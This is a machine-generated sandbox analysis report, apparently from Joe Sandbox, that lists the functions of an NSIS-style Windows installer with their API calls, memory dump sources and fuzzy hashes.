                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemWindowwsprintf
                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                          • API String ID: 3537556175-1158693248
                                                          • Opcode ID: 0c12958a6f58522a21ae53b8f34ec5b53da9be604ef77715907142ca918d6e84
                                                          • Instruction ID: 36984b7fba3c094db4c00eeca5c3e11b36af4ec59ad9ba0032560c7d2284b6f4
                                                          • Opcode Fuzzy Hash: 0c12958a6f58522a21ae53b8f34ec5b53da9be604ef77715907142ca918d6e84
                                                          • Instruction Fuzzy Hash: 5FF0F0719041049FEB019BA0DD08AAE3BA8EB11308F04807BF502F60E2DBB99849DB69
                                                          Function 00401752 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,00409598,00435000,?,?,00000031), ref: 00401793
                                                          • CompareFileTime.KERNEL32(-00000014,?,00409598,00409598,00000000,00000000,00409598,00435000,?,?,00000031), ref: 004017B8
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID:
                                                          • API String ID: 1941528284-0
                                                          • Opcode ID: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                          • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                          • Opcode Fuzzy Hash: c6112705f82b7b1622065ee3eab6168811afede877eaf12318c42c814ff79ec4
                                                          • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D
                                                          Function 00402B7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                          • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                          • Opcode Fuzzy Hash: 7fa7a74cbbe584c41cdd651777289953afc00df8a6fd94206c47d0172b2a88ac
                                                          • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69
                                                          Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                          • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                          • Opcode Fuzzy Hash: 4425ef670e00afe2a656f4b56edeb2e82870f2bba3a859581bccad4f1df822b2
                                                          • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                          Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401D44
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                          • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                          • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                          • Opcode Fuzzy Hash: e505f65a548bf0974f6aee529334db0e8f2b0f649825e5e5403c9d7ad871e098
                                                          • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                          Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                          • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                          • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                          • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                          Function 0040317D Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00403192
                                                            • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                          • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                          • WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$CountTickWrite
                                                          • String ID:
                                                          • API String ID: 2146148272-0
                                                          • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                          • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                          • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                          • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC
                                                          Function 00402331 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                          • lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                          • RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID:
                                                          • API String ID: 1356686001-0
                                                          • Opcode ID: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                          • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                          • Opcode Fuzzy Hash: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                          • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29
                                                          Function 004015B9 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,00436800,?,774D2EE0,004057F0,?,00436800,774D2EE0,00434000), ref: 00405A4C
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                            • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                          • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                          • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                          • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3751793516-0
                                                          • Opcode ID: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                          • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                          • Opcode Fuzzy Hash: 7fc8d92597ca224d1c9d0f403f8dd560b19a4790d4067b824d9ac869d91d7f68
                                                          • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E
                                                          Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1404258612-0
                                                          • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                          • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                          • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                          • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                          Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                            • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                            • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 3585118688-0
                                                          • Opcode ID: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                          • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                          • Opcode Fuzzy Hash: 35074abae760ef12712c5987b0758c23aa86cdd0156e8bbbcf6b223dd8d47178
                                                          • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                          Function 00405166 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00405195
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                            • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                          • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                          • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                          • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                          Function 00405BE3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405C01
                                                          • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C1C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: nsa
                                                          • API String ID: 1716503409-2209301699
                                                          • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                          • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                          • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                          • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                          Function 004056C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                          • CloseHandle.KERNEL32(?), ref: 004056F5
                                                          Strings
                                                          • Error launching installer, xrefs: 004056D6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                          • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                          • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                          • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                          Function 004069D2 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                          • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                          • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                          • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                          Function 00406BD3 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                          • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                          • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                          • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                          Function 004068E9 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
